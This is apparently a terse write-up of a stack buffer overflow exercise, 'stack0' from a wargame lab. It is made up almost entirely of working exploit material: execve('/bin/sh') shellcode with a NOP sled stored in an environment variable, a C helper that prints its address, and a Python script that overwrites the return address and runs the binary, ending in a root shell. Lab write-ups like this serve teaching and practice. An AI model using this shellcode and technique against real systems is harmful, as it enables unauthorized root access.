Place shellcode in environment variable
$ export PAYLOAD=$(python -c 'import sys;sys.stdout.write("\x90"*(100) + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")')
Find addr of 'PAYLOAD' environment variable
#include <stdio.h>
#include <stdlib.h>
int main(void) {
printf("PAYLOAD: %#08x\n", (unsigned int)getenv("PAYLOAD"));
return ( 0 );
}pwn.py ( or u have simplest way... )
#! /usr/bin/python -W ignore::DeprecationWarning
import sys
import struct
from subprocess import call
if sys.byteorder == 'little':
Q = lambda x: struct.pack("<I", x)
elif sys.byteorder == 'big':
Q = lambda x: struct.pack(">I", x)
payload = "\x41"*(0x40) + Q(0xdeadbeef) + "\x41"*(0x10) + Q(<addr of 'PAYLOAD' env var>)
open("/tmp/pl", "w").write(payload)
call(["./stack0"], stdin=open("/tmp/pl", "r"))Wrapping it up..
$ python pwn.py
you have changed the 'modified' variable
python -c 'import pty;pty.spawn("/bin/sh")'
# whoami
root
# echo -e "And there u have it.. :)"